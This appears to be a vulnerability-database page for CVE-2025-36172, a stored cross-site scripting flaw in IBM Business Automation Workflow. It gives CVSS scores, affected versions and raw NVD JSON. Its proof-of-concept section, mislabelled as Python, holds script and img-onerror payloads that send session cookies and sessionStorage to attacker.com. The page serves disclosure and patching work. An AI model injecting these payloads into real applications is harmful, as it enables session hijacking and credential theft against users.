CVE-2025-36172

Description

IBM Cloud Pak for Business Automation 25.0.0 through 25.0.0 Interim Fix 001, 24.0.1 through 24.0.1 Interim Fix 004, 24.0.0 through 24.0.0 Interim Fix 006, and earlier unsupported releases IBM Business Automation Workflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_001:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_002:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_003:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_004:*:*:*:*:*:* - VULNERABLE

IBM Cloud Pak for Business Automation 25.0.0 至 25.0.0 Interim Fix 001

IBM Cloud Pak for Business Automation 24.0.1 至 24.0.1 Interim Fix 004

IBM Cloud Pak for Business Automation 24.0.0 至 24.0.0 Interim Fix 006

IBM Business Automation Workflow 所有更早不受支持的版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-36172 Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in IBM Business Automation Workflow -->
<!-- Target: IBM Cloud Pak for Business Automation / Business Automation Workflow -->

<!-- Step 1: Identify a text input field in the application (e.g., user profile, notes, description) -->
<!-- Step 2: Inject the following payload in the identified field -->

<script>
  // Steal session cookies
  document.write('<img src="https://attacker.com/log?cookie=' + document.cookie + '"/>');
  
  // Or perform actions on behalf of the user
  // Fetch internal data and exfiltrate
  fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(sessionStorage)));
</script>

<!-- Alternative payload using event handlers -->
<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">

<!-- For demonstration purposes - actual exploitation requires: -->
<!-- 1. Valid low-privilege credentials -->
<!-- 2. Access to a writeable text field -->
<!-- 3. Victim visits the page containing the malicious script -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36172
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36172
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36172/
[4] VulDB https://vuldb.com/cve/CVE-2025-36172
[5] https://www.ibm.com/support/pages/node/7250047

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36172", "sourceIdentifier": "[email protected]", "published": "2025-11-03T22:18:51.097", "lastModified": "2025-11-05T18:42:42.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Cloud Pak for Business Automation 25.0.0 through 25.0.0 Interim Fix 001, 24.0.1 through 24.0.1 Interim Fix 004, 24.0.0 through 24.0.0 Interim Fix 006, and earlier unsupported releases IBM Business Automation Workflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "EF879B84-21B0-4FD4-AD2E-7F29EBDD218A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_001:*:*:*:*:*:*", "matchCriteriaId": "496D1A48-3403-471F-AD07-AEC7E5000AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_002:*:*:*:*:*:*", "matchCriteriaId": "AA215EC3-DDFE-494D-862C-35CA30D9BEDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_003:*:*:*:*:*:*", "matchCriteriaId": "969ED94C-DB65-482F-B8B8-251B56DE264D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_004:*:*:*:*:*:*", "matchCriteriaId": "D1810412-5987-4F53-A81E-096A4F0187B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_005:*:*:*:*:*:*", "matchCriteriaId": "9CC01202-3D62-4544-BE9C-47300063896E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.0:interim_fix_006:*:*:*:*:*:*", "matchCriteriaId": "23966701-9B59-4CF9-9425-2C029318BF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.1:-:*:*:*:*:*:*", "matchCriteriaId": "F68528C5-034B-4B2C-8745-B969B14B52C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.1:interim_fix_001:*:*:*:*:*:*", "matchCriteriaId": "EADE80E3-4E60-4154-A559-93E2325D799A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.1:interim_fix_002:*:*:*:*:*:*", "matchCriteriaId": "D01FC35C-29F1-4D57-8804-07A5C1E9EA85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:24.0.1:interim_fix_004:*:*:*:*:*:*", "matchCriteriaId": "4D682E4B-DA22-4F88-A38F-76FF080AE0B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:25.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "70431A72-663D-432E-9D94-5BBE380E06AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cloud_pak_for_business_automation:25.0.0:interim_fix_001:*:*:*:*:*:*", "matchCriteriaId": "33128B64-7030-4A4E-8EF2-E285AF44F99F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250047", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}